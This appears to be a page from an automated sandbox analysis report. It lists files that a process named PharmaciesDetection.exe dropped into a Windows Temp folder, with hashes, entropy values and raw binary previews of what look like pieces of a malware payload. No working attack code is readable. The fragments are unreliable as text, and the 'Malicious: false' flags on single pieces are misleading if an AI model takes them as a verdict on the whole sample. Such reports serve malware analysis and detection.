Preview:	..UJ.;...4UJ.k...@UJ.....PUJ.....\UJ.....hUJ.....tUJ......UJ......UJ......UJ.;....UJ......UJ......UJ......UJ......UJ......UJ......UJ......UJ.;....VJ.....$VJ.....0VJ.....<VJ.....HVJ.....TVJ.;...lVJ.....\|VJ......VJ......VJ......VJ.;....VJ.. ...VJ.. ...VJ.. ...VJ.; ...VJ..$...VJ..$...WJ..$...WJ.;$.. WJ..(..0WJ..(..<WJ..(..HWJ..,..TWJ..,..`WJ..,..lWJ..0..xWJ..0...WJ..0...WJ..4...WJ..4...WJ..4...WJ..8...WJ..8...WJ..<...WJ..<...WJ..@...WJ..@...WJ..D...XJ..H...XJ..L.. XJ..P..,XJ..\|..8XJ..\|..HXJ.a.r.....b.g.....c.a.....z.h.-.C.H.S.....c.s.....d.a.....d.e.....e.l.....e.n.....e.s.....f.i.....f.r.....h.e.....h.u.....i.s.....i.t.....j.a.....k.o.....n.l.....n.o.....p.l.....p.t.....r.o.....r.u.....h.r.....s.k.....s.q.....s.v.....t.h.....t.r.....u.r.....i.d.....b.e.....s.l.....e.t.....l.v.....l.t.....f.a.....v.i.....h.y.....a.z.....e.u.....m.k.....a.f.....k.a.....f.o.....h.i.....m.s.....k.k.....k.y.....s.w.....u.z.....t.t.....p.a.....g.u.....t.a.....t.e.....k.n.....m.r.....s.a.....m.n.....g.l.....k.o

C:\Users\user\AppData\Local\Temp\Barely

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	6.615822679045742
Encrypted:	false
SSDEEP:	1536:Mhgt2F9m+qMHUPe3vKsyJXT6TLx3nS4/33SrFv:Mq3U0Pe3vHU4S4/33SrFv
MD5:	3F190D8EFBC3C814B81B56987037B7DC
SHA1:	6B1837CA72CC8136715149A6986CDE78578D14F3
SHA-256:	59FAE68A446F276BEEA0EE0FC866828B20DD52790FFA5F86FB964A962DD66A4F
SHA-512:	F3932F638E9EF0CD2F8A638BB3166AAE64540A7FF0C2AFE7183740B1C798642CE0795455F489A4B66543CBDE0A3C6EBD418AF16AF965CC882BC3EBC17ED30E85
Malicious:	false
Preview:	".:csm.t..:&...t...#.;.r..A ........B.ft&9q.......9u.......Q.u..u..+..........9q.u...#.=!...r.9q.u.;.rh.A .....t^.:csm.u:.z..r49z.v/.B..p...t%..E$P.u .u.Q.u....u..u.R....I.... ...u .u..u$Q.u..u..u.R....... 3.@_^[].U..V.u............J...^]....a.....a...A...J.....J..U..E....P.A.P.......Y..Y..]...j<h..L.......E..E.e...]..C..E.}..w..E.P.{...YY.E.......@..E.......@..E.......x.......M..H..e..3.@.E..E..u .u..u..u.S.A........].e.......u..j...Y.e......` ..}..G..E.W.u..].S.........E..W.3.M.9O.v:k...].;D...].~".}.;D...}...k...D..@.E..M....E...A.M.;O.r.PWj.S.Q......3.].!]..}..E......E............M.d......Y_^[..}..].E.M..A..u..t...Y......M.H.......M.H..?csm.uK....uE... ...t....!...t...."...u*.}..u$..t .w......Y..t..}........PW.(...YY.j...'D.......b....x..u..e.......N....M.j.j..H..o........U..E....8csm.u6.x..u0.x. ...t..x.!...t..x."...u..x..u......3.A.H ..].3.].U..j..u..u..u.........].j.hh.L......u..u..u..D.........u......@..e..;u.th..........}.;w........G.....M..E......\|...t

C:\Users\user\AppData\Local\Temp\Bathroom

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	22528
Entropy (8bit):	6.699129528400463
Encrypted:	false
SSDEEP:	384:vTugTVxJZA6b6/Q/ceOIl2XDoXwT7HBXyerAPV+xleN:PT/JW6e/Q/cXIl2EX4tXyeXxleN
MD5:	73A5769B0D0BDA93DB733B26589113A0
SHA1:	BB8CABA82A5339802615B29D81DED3DCBA6151CE
SHA-256:	E4DB4DB3B69E13FB052A3FDE7F14CDC59BB1619E47BB10C397AE82053A7000E2
SHA-512:	356A5841569EBA5E90CB897A4BFD32FEECFF2E7461160A8C3AD63BDDE080399B0F8AB8262418DBC28230E67623F63E0E736FF452E67E581FA4408CB7971E8E28
Malicious:	false
Preview:	.......,...........3.3....0.......0............F..;.u...t...,.....ssN...0.....,....e3.P........,.........P..0...SP........2..7............,....j...3.P..,...............P..0...SP.................,...........tw3.3....0...j.Z......0......G..;.u.............tB..,.....ss.....0.....,....&3.P........,.........P..0...SP.!..........\...P..,...P.1...YYj.Z;..............w...\.....1..............3...3...`.....j.....`......A..Z;.u.......t\..\.....ss....`.....\....B3.P........\.........P..`...SP.p..........u.......H...0.w......................A.........x.......w...E.H;.r...............;.........,...........3...3...0......;......0......A..;.u........t@..,.....ss....0.....,....&3.P........,.........P..0...SP.........\...P..,...P....YY......j._+.3.........0;.r...7O...u...v.j.Y......;.......-.......*h.gJ...h.gJ...h.gJ...h.gJ..u.S.0.......u'..t...._^[t...l...P.}...Y.M.3........].3.PPPPP.......U..M....u..h/.........8..x$;..!M.s.....?...k.0.....M...D.(..@]..3/.........l...3.]..U..U

C:\Users\user\AppData\Local\Temp\Bench

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	6.626969924367001
Encrypted:	false
SSDEEP:	768:XViUpLSifdrdqGhSlsB4IHo5DmJ2YAuT9XCYsywaVtTSVn7XTj:XVVSoNd6sqII0RAuTtCHaVej
MD5:	99F0B7D1980E51CB51C040F94CA6BDA4
SHA1:	FB250E5D30584DB09BDB3CD3647ABB49F33B9A9A
SHA-256:	2EFB0040EB9A496CC6A93003C844046EFD0F93061BA02C49037E7017F2301AB0
SHA-512:	5380FFAA93FD9ADDB608423A27A009AF90E5BC57EE857686F5FF16DF337E3DDBFA34B64E6AFDFCC74A0C16D703BF0621AA905B804427C6ADAE99229447BB7007
Malicious:	false
Preview:	.M.SVWQQ.M..E.Q.H.2..z....u......tl.E.3..}.9x.v_...M.Q2..4.j...<.I...tH.e...>.v?.}.F..E.j..M.QP..........u....E.G....E.;>r.}...t..E.G.}.;x.r...t.Vj...t.I.P..x.I._^..[..V.q.Vj.j(..X.I.P..4.I...u.Vj(..\.I.P..8.I...u.!..>.^....U....S3.f.E....E..].PSSSSSSh ...j j..E.P..X.I..E...t!.E.P.u.S..\.I..u.....!E...`.I..E....[.....U....SV..Wk^.....S.]..k.....S.}..`...YY.N..F...3.9N.v+._....C.......S.4.Q..<.I.G...j.Y;~.r..}..].9N.t.QQQ...E.PQSWQ.v...0.I.j.W.....YY..0.I..._..^..[....U..QQ.e...E..e..SVPQ.M..E.P2..5....u......t^W3.9>vV.N........#.;.t.G...;>r..<.t....L.I.Pj..E...t.I.P..p.I...E.....t..t..Q.u...P.I...t..._..t.Vj...t.I.P..x.I.^..[....U..SWj.j...t.I.P..p.I..=\.I...j.j.j.S..P.E..0..P..d.I.j.j.j..C.P..P.E..0..P..d.I..E....C.3.PPShV.F.PP..h.I._[]...U..W.}.j..7..l.I..w..w...l.I..w...`.I..7..`.I.Wj...t.I.P..x.I.3._]...U..V...$....}..t.....<.u.j.j.j.j.... .....^]...j.j.h.....1..H.I.H.......U....SV...M.WQ.E..0....I..u....u..E.+E.+.....E....u..E.+E.+..............3....F...M..}...E......E...

C:\Users\user\AppData\Local\Temp\Cake

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	6.341036152981317
Encrypted:	false
SSDEEP:	192:uRgoWPJpBhTYpJ3pJGi3NcHBvazoo9XlNQCM+kSntZ:GlWzBhTYpJWSmkzf9XlNQCM+kStZ
MD5:	12333550EFD9DD43718F5689EA61F5F1
SHA1:	AA30DC952B02FFC2649C430063103489F4E81450
SHA-256:	E8C81F887906F7E9AC6D28B086770DB1FC355635D79B3429ECB2607E50E65647
SHA-512:	27C089894B9DAF0837252F6B3277458EC5FF80C2B94FC885498512A933C7CEFCCA9CC28ABCBEA5DF2F93E0D3AC141F7E93E79B5FE93B6E0AF1716027141AB600
Malicious:	false
Preview:	$,.....D$ .....D$p$.I..HN...t$t.........D$P$.I..L$P.+N...t$T..................t$ ..t..t$ ..t..$....D$T.D$..r.......D$.......D$......x....h....D$.3.T$h.H....f9P.u#.......$t....u......F...f.x..t.T$h.\|$.3............<.....@.f..Gu.A.....f..H................D$d..2.\|$L.T$h.L$@9D$........F..$........Q..$.......$.....$........P..$.....$........P.t$$.........5....D$h.....j.P..$....P.D$$.@.....0......$.....,....7f..@u.....S...B....%....D$........L$.j.R.0.A.....0....D$..L$.@.t$@.D$..F.D$.;A.......h.oL...$.....fw..3..\|$,.j....H#D$$j.P..$ ...P.......$........D$...j.j..@.@P.......3M.......L$ .n....L$p.D$p$.I...K...t$t........D$P$.I..L$P..K...t$T.k.............`.....$..........t$(..t7.F....F..8.u..6.4......j..v.........j.V.........D$(.....D$,......................$..3E..L$ ...............a...........)M..............~.........N.Q...g}...D$@............$$...h..K...$.....$.........$..........u..j...$......3M.P..$,...P.#.....$$.........D$@...a....j.j..@.@P.`...Q...a......!....$

C:\Users\user\AppData\Local\Temp\Club

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.442249645703308
Encrypted:	false
SSDEEP:	384:kqhbk+k7B/oPN72jljSKgaEVXqcBe3ASH7djM2COa:dhbVk76PJslrmTAp7djEv
MD5:	B6B7838D27D7D6370C4C56038270002C
SHA1:	3D25AF0E449EA795FE9ACB061487B74C4B4B82C2
SHA-256:	84FDA09356BD13134E107D49E0C4525AB7DF713B71FFD75602E8A699E2D0095C
SHA-512:	74839E4F3DCBF2BEC604533FC11B84A9A7AF6F37E6C7F955EE535F74CE19E85BC38BF7AD2142F3269F8E1EE95E758A18069B91654F9E5BDD8B54036E0E2AB1EF
Malicious:	false
Preview:	.....Cl.............s\|PVS.@....M(.k....}..t..}....d....6..d.I...3.PPj1.6.E ..H.I..= .I.PS..U....E..P.....YVS..u.S.6..`.I..E....t-...t ...t....u&.U.M.... .U.M......M......M.U....M ..]...9}.u.9{dt..=.(M..t..A..Cd9}.u.9{`t..=.(M..t..B..C`.u..sd.s`.s\.sX.6....I..}............t...........................sPW......{....sTW......w...W..?...M.....e...E...m...f.E.f...........f.E.f...........E.+E.f............U..E..............U........u.3.A....M......j...L.I.)E.......E.+E..M.+...+.f.......M.......}.+E..E...E...}....}.+..E.f.......].....+..+.U.....+.f.......}.....+..E.......U....+...f.......U..W...f.......\...f.}...E.....E.....E..E..}..}....t.+E.f+.....f.E.f..f.......&...+E.f+.....f.E.f..f...........f...........f.}...M....}.......t.f+.....f+.f..f..f...........+.f+.....f..f..f.......................8...........SV.. .I........u!.}..t..A`.E..AX.}.........Ad.E....E....t..AX.E...........A\.\|....E.JF;...O.......V.E.P.K...;.t.P...JY...M...X..........;;A...........Hj.......Y.

C:\Users\user\AppData\Local\Temp\Compile

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.997408342262568
Encrypted:	true
SSDEEP:	1536:SAhv62aXBmuIUaSFy6D5Ys04ZysGvrxjGmt6Du3LVil4:SN7uzOf5Yp4ZysCrdGmt6mIl4
MD5:	74809A51191E9BD7D017593155539330
SHA1:	A153914897EF035E59E60CBE28E6FAA04D37C345
SHA-256:	C0F4DC26A5EE8028DCD52FD647989611628677B82642FA368E146E21776F6566
SHA-512:	87924B083DE647476A5D493AF0CF03967CFEFB691A76D20585D3A04C0943D595D33ED388748E448D19B32F5FA0B3BE461E5B9BB9BA8CC153A46C6005EF9E5150
Malicious:	false
Preview:	.Od.`J...j.h.K.../...Z...a.6e.......z=Z..QO`..a.p.....8n6...........,Y.<.9....QA.H......jC>.++.iRq...C`...zp.bFp.NZ.......z...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....F.G.'.F...h.............p...T...p...T...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.T..,P..Myn.2..t.W.....g.........#p.......p...T...m........qx.5...x..2).U.j.....>.4#...t........~5i...A=.....wX.g.....=.a.u.C.'.&...'>....`HR.O.....me..w.`.}.......0...c..Ud...cP&..@.\jwr.......\j.....`'_.Nl.W....0....[2wz.....\>....}nsR.....s.......S...r.ie.).?...../..9..P..x.>...h......w_\...e.d..z<..k5~..a.X....F.......{b....4.1y!.O&.../>......f......p..[..J........!.&@....C..<..0..\|<.y^.o. ..g7B...O..]..5oN..

C:\Users\user\AppData\Local\Temp\Consoles

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	30720
Entropy (8bit):	6.710508352528447
Encrypted:	false
SSDEEP:	768:/83OaSmnpPU+vNEvH1qamdsnRsYnjDORUfqK65oHzMSkCxZYL:U3OAOvHZnR2Uf9MoHzBxKL
MD5:	18B7ADCFBD90A1C15E9F1F6695C5D901
SHA1:	CF63F46B82388AEEE71BBFB8E562DE2A146AE6EE
SHA-256:	B30240078C64097B4256BE548703AC506E1F1243539566558AC6D5A4342EA0C2
SHA-512:	88925F016B92D75168770782E3BD0A9598F3779C9B17C973FCF7CD753BB55B0CF8B72C525937FF784C609846279A54A96A70554E94F7B77808E8A53B665D790C
Malicious:	false
Preview:	....$..SE..........P.T$hj..6.............t}.K..g..j..h....tk.......j..W...p.......j..6.V.......y.........o...Q......d.........Z.....j....O.......t...."g..j.S.........\$$......L$,.7......8...T$(.]....L$,.....P...9...E..H...h..M..L$0.D$......,....u..E....@.....L$,.8.X.............F......>.^.......K....M.;.......P.g...........L$,.0......v......:....@......h..M..L$0.D$.........}..u....V..D..f.x.G..........\$(......$.....A...$.....A...$.....A....$........$....P..b............$....P.L$0........@.......$.....e...D$4.\$,.D$..D$0.D$..\$$......$....P.L$0....\$,..PWVj..\{........................D$4.\$,.D$..D$0.D$..\$$.u....D$..........\|$...D$..................$.....$........P.L$0.$.........$..............}..u..L$,PWV.........A.....$....P.L$0........[....$............\|$...............$.....$........P.L$0.$.........$............}..u..L$,PWV.\.............$....P.L$0.m......g[....$.....0....V....u..A.............u..A.............L$ .T$...t..A......8.t9..t..A....

C:\Users\user\AppData\Local\Temp\Czech

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.405089114209641
Encrypted:	false
SSDEEP:	384:vFpSOcoygCYNi3E1fdL3xnoR9t6T1vgA8kX7d8ILMwS5/Uwzc9mjqM:v0gNNiOfdjxnePB/qLMH/UwA9aT
MD5:	008576B744929086782F21A7065AC7C6
SHA1:	5D4D7607A007C1A068C2079DF38FC0464B6F9A2A
SHA-256:	A13C473C321151D9A0A95E835686A599CC8B610CC3100878AAEBDA99C1032C5C
SHA-512:	BD9C81EF3711EB293C6B5A71C3C9C00915F31AB8D8718F49E4CE1C8793225A966791A2C3C965C5A749C798AF16D731EAC6D5545D35E721FF0DCA6ECF51AC7C73
Malicious:	false
Preview:	.2._^[].(.U..E(@..V..#E(WP.?..3.VQ.u..u$.u .u..u.P.E,@..V..#E,h..L.P.u.......}.....u.2..\S.....SV.5H.I.h. ..P..S3.Sh.....7..SSh.....7..h..d.Sh.....7..SCSh.....7..=.(M..u.f........[_^].(.U..E(@....#E(...P..>...M..yi.u.......Ai.Vj.Q.u..u$.u .u..u.P.E,.u.@..h..L...#E,PQ.T....u.....u.2.."j.....I..FL.=.(M..u......f........^].(.U..E(3.A...u...SVWP.W>..3...E,WQ.u.@.u$...u ...u.#E,.u.SWh..L.P.u.......u.....u.2..EWW.=H.I.h....P.....t.h..d.j.h.....6..j.j.h.....6..3.@.=.(M..u.f......_^[].(.U..SV.u.W..............E(@....#E(..@..P.=...M,..E A........#M,...u...E .}$...u...j.Q.u.WP.u..u.Rh..I.h..L.QV......].....tRj W.u .u..u.j.P....I.....................................=.(M..u......f..........2._^[].(.U....SV.u................E.3.f9.tP.......E..E..E..E.P.......E.....h>...Q..H.I...................M.......f.......7......8^8t..............PV..=........8^8t.j.S.6..X.I.2.^[....U..E(...u.j7XSVW.....P.)<..........#.t.3.E,......u @....#E,...u....U$...u...j.Q.u.RV.u..u..u.Qh..I.h8.L.PV.....}.

C:\Users\user\AppData\Local\Temp\Deborah

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	24061
Entropy (8bit):	7.262249897829757
Encrypted:	false
SSDEEP:	384:mlgavhytCjWoQL9dR0Xvwp52UW1l/hw50gFQTVaeCV1VEVFJ8ZcGwGBk7/UMQ3K6:mlgaJyc3rE2UWb/hMjFQTVat3VEV3GPP
MD5:	C8ED52EE2DC8795B24B1A7450E852153
SHA1:	77DB46296FA8AF5F1AC6C9B0136AD3A39521E4DF
SHA-256:	8268BCDA9CB466F90B2BB49C7E2A6A23E85C2CD8C7C63170E3C07839F40B333B
SHA-512:	FF830E5453554B2D2B1763E648009030F00A0853695A120584F0D89B148B31D7290A8632BE57ED5CDD0F9D8B82EEB0F6DDF825537E1D7BD7558D87113B102953
Malicious:	false
Preview:	.....,...o3\|3.3.3.4.4.4d4&5^=b>o>w>F?U?]?d?......H....0)010.0.0.1.1.1.1.1.2.2.3*32393.4.4.4!4.4.4.6.6.6.7.7.7$7.8.;.?........&0_0.0.0=1z1=2A2E2I2M2Q2i2m2q2u2y2}2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3.3.3.3!3%3)3-313a3e3i3m3q3u3y3}3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.4.4.4A4E4I4M4Q4U4Y4]4a4e4i4m4q4u4y4}4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4!5%5)5-5155595=5A5E5I5M5Q5U5Y5]5a5e5i5m5q5u5y5}5.5.5.5.5.5.5.5.5.6.6L6r6.6y7.7.7.7n8{8.8.8F;.;.;&<L<!=1=T=e=!>0>....T...`2.4.4.4.4.5U5g5p5x5.5.5.5.5I6X6 8/8.8.8.8.8.8.8.8.8.8.8.8d;r;x;.;]<.?.?#?/?.........1.1.3.4m6.7r8.8.9.:.;.;5<9<=<A<E<I<M<Q<U<Y<]<a<e<i<m<q<u<y<}<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.=.=.=.=!=%=)=-=1=5=9===A=E=.=.=.>.>... ......}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.192@2a2t2.2.2.2.2M3v3.3.3.3.3(4X4.4.4.4.5t5.5.6V7.8u8.8^:.:.:.:o;.;.;.<b<.<.<.<.<.=.=.>.?...0.......1.1.1.1.2A2L2S2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3.3.3.3!3%3)3-

C:\Users\user\AppData\Local\Temp\Desire

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	2.425293702421789
Encrypted:	false
SSDEEP:	384:b3WMygaruSIKlcYaffffm4aLWWZg319stEjFto:ugar3R3GWZg3EYo
MD5:	1B7F48B935D786DEABE81D80E8304102
SHA1:	FB4563CD0145238A5219623F3D55515CFD1F9B3C
SHA-256:	B67FA393883721DF42E25346F033FFEA20A5775C3AD65B1CAD4995A9399EE494
SHA-512:	C8394F128FE1F2697A3D7E6734D4FCD16DD8BA340404029AE67E1B992F019FB43D2B010B807CA42590FD3781D5030BC47FB7C45C0BF72DE80B50BC442EE97380
Malicious:	false
Preview:	essageW....TranslateMessage....DispatchMessageW....LockWindowUpdate..].GetMessageW...BlockInput..&.OpenClipboard...IsClipboardFormatAvailable....GetClipboardData..I.CloseClipboard..V.CountClipboardFormats...EmptyClipboard....SetClipboardData....SetRect...AdjustWindowRectEx..T.CopyImage...SetWindowPos....GetCursorInfo.V.RegisterHotKey..G.ClientToScreen..A.GetKeyboardLayoutNameW....IsCharAlphaW....IsCharAlphaNumericW...IsCharLowerW....IsCharUpperW..X.GetMenuStringW..z.GetSubMenu....GetCaretPos...IsZoomed....MonitorFromPoint.._.GetMonitorInfoW...SetLayeredWindowAttributes....FlashWindow...GetClassLongW...TranslateAcceleratorW...IsDialogMessageW..{.GetSysColor...InflateRect...DrawFocusRect...DrawTextW...FrameRect...DrawFrameControl....FillRect..@.PtInRect....DestroyAcceleratorTable.X.CreateAcceleratorTableW...SetCursor...GetWindowDC.~.GetSystemMetrics....GetActiveWindow.1.CharNextW.3.wsprintfW.J.RedrawWindow....DrawMenuBar...DestroyMenu...SetMenu...GetWindowTextLengthW..j.CreateMenu....IsD

C:\Users\user\AppData\Local\Temp\Elsewhere

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	6.4444830986437465
Encrypted:	false
SSDEEP:	384:/cfWX2mwcTVmeOwa9XyJZW06WCHAdjs1f9QrEMetI2zbLJSlvuHdUYzGM84qKoiX:CMEMUnLm8dUYzp8HKoqKs45T+5ht7
MD5:	13D593C5754D6F4A8E9AF71BC5FD7436
SHA1:	7C2802EFE0DD30482D5957E1E8974EA9BBC83D62
SHA-256:	B0A17D66F902476BE402A90D0341803C35A5BAD11862EBFFBF142843D7E6A8BD
SHA-512:	EB401457914FDB5FCDB15163A814C2699E95FCF8187B9016A9561E5E41CEBDA83FFDDAEC4B55A0052494466F5F7DF67C9F4A6CADF33A090FEABB73BBCC88FFA0
Malicious:	false
Preview:	F....x........j8.`......$.....'...`..Y..G..o....O..g......`....F..0.......v....J...3...@PV.G(.:.....te..................G(........G(.t..G..G.........,.u.j.h.FL.....1...m..,.u.j.h.FL....,.uXj.h.FL...Q.......u.....3...&..F....._3.^..]...j.P.D$.P......t.......D$.......x..G(.t..E..@..p..~..............................}...v.tx.F...t'H..P.D$..S...f.8.t^.t$....B...f.8.tM.F.....L$.P......D$.;.t.V...l...hH.K..L$......D$...P.%1...L$..D$.......D$..2V....1...(...D.....E..H..I........VR.0..;.t.2...u..u.....2...&..F......E..@....x...........v...Q...>.......U...\|...SVW.u..M..M.. ....E.M.E.E..E..E.E.E.h.{L..E................P.u.....I..E...........u..}..M.................u.j...\|.I.........h,.I.P.R...YY..............h.{L.P.7...YY.........E.P.M............P.M..l..........t>.}..t.....V...}..tNh(.I..M..C....u..M..u.VW.u..u.........tA.#.U.3................J..}..t.....W........P.u.....I...........2.E.P....I..M.. ....M......_^..[....U..V..M.......P..E.....x3.M........t';.....}.....

C:\Users\user\AppData\Local\Temp\Ensemble

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	125
Entropy (8bit):	3.915438283623625
Encrypted:	false
SSDEEP:	3:cwX7O72Uqt/vllpfrYZcFTS9n:cwXKqjvVgn
MD5:	596CE3EA9E2A42098635B6783A45C3BC
SHA1:	51A0F934024A3BDF8298DD81DA7504CCC054D72E
SHA-256:	47E13870CE739ADF64B33D403D391E14E29371C084CD243A6AF8386A9BF48AA3
SHA-512:	0106AC3A9DFEE0DFF5A8CB42C2A8979929462B30D5115D3F34A9531D99A333F79F1331D7345A0BF95572F430E76BA10B6F2291550B237CC6537352D5A3275408
Malicious:	false
Preview:	typesfaxincreasecompound..MZ......................@...............................................!..L.!This program cannot b

C:\Users\user\AppData\Local\Temp\Expenses

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	64512
Entropy (8bit):	6.63709531987453
Encrypted:	false
SSDEEP:	1536:HoaLjzZU6i5HkY5RrVGyanwUhhNpis3aUQzQpOQ2qJdpnVwNxF5J:tfza6iyY5tVGvH7fsUQwHJJX4xF5J
MD5:	A29DC843982AE5D6F39F526AF992C746
SHA1:	F347D40AA331B98A890CF1DC53B81B079AA5A178
SHA-256:	D4C38B731D74A94D6840D655F51AFE3B845627912D7686BF7203D328DBC3E811
SHA-512:	98AC878A752F176D62FBBDC4E3A205DEA744C33B0DF090843C264AC6BD5A863CBE38DC4E15E9DF4B28F4954BA5962C3A7AA6E2D5C720291B3DDC2AD078B5B6C9
Malicious:	false
Preview:	.....f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j[....I......f..u.j[......f..t.....u..F..[_..^....U..QQS..3.V..E.W.x.CO.&..e....xPW......j0Y...f;.r...9w.+.....Ar...Fw...7....ar%..fw ..W........O.E.@.E.....E.\|....t..&.2....._^[..y..........<.......<-......<.......<#......<(t.<"t{<%tw<'ts<$to<&tk<!tg<otc<]t_<[t[<\tW<.tS<.tO<_tK<.tG<.tC<.t?<.t;<.t7<.t3<.t/<.t+<.t'<.t#<.t.<.t.<.t.<.t.<.t.<.t.<.t.<.t.2....SW......t=V3.9w u4.w...H.I...t$._...4.I.;.t.....O..j.Y.9...F...\|....w.^_[.3..A.......f.A..A..U..E........8.V..t..F.......N..x..t..F...x..t..F..3...t.8F.t..F.8F.t.8F.t..F.8F.t.8F.t..F.8F.t.8F.t..F.8F.t.8F.t..F.9F t}......P....I..........N..V........ E........ E...u........ ......~....... ......~....... ............ .O.........P....I..8...SW.M..i.......I.h......=..I......f..u.h..........f..t..~..u.h.....M.......E..P....h..........f..u.h..........f..t..~..u.h.....M.......E..P.~...j.......f..u.j.......f..t..~..u.j..M.....

C:\Users\user\AppData\Local\Temp\Film

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	4.686237478132523
Encrypted:	false
SSDEEP:	384:xa3HwwuBcPTc/mwftIQXoSpu88888888888888888888888888888zv888888k:xaAwuoc/mexe
MD5:	C64C2B97D85DC1E693AC8380A02561B9
SHA1:	3D7A7CA779535DC95884A8DB3D0C219900B80073
SHA-256:	22B3E1A7C825C104CC6E4663F983BAA48B6209C04EEE38B7E5ED24C883595D91
SHA-512:	8CAC7E97AFA2AE76A066BEE29B9607740DEE54FE5DB87BC86C9100ABEA5E58952DFEBAB1E40F3FC9929B82AC0A63AE4103EB83139DB44D29423C930F804373AB
Malicious:	false
Preview:	.....H.......K.......................................!.......!.......!..?....!..?....!..?....!...A.......................J.......V.......d...............p.......~......................................................................................................................................C....!..GA...!..K....!.......!.......!.......!.......!...................................0...........!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......................................................:.......:.......:.......:...............................................................................................................<.......<.......<.......U.......U.......U.......L.......L.......L.......L.......................N.......N.......N.......N.......!....u..!....Z..!....Z..!....Z..!....Z..!....Z..!....Z..!....Z..0.......0.......0.......0.......@.......@.......J.......J.......J.......J.......J.......D.......D.......D.......D.......I.......I.......I.......I..

C:\Users\user\AppData\Local\Temp\Geographic

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	4.954169025998645
Encrypted:	false
SSDEEP:	768:hGMAGWRqA60dTct4qNn2fhRE9PfKj+wsxyLtVSQsbq:gMaj6iTcohiPfKj+wsxw
MD5:	7A11677FD70F9EF646AD3B1ECC34C6EC
SHA1:	CBCE0D9C083EF29E1859A78AEEBD22EB8BC7098F
SHA-256:	2BD3AB984634CA7092F8C376BC1238D23D1E713FB1614BAF5F216C6515420AB4
SHA-512:	25A2552CB2D5C9AE54C59167323595B2F93FBA218F2BA8CA4A830BAF10A5AFAF0CD77CCA61D61DC3F5B47DF5E7023889229051946E0B9A860073FECFDEA2CE17
Malicious:	false
Preview:	.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................r.r.r.r.r.r.r.r.r.r.r...............................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.....r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.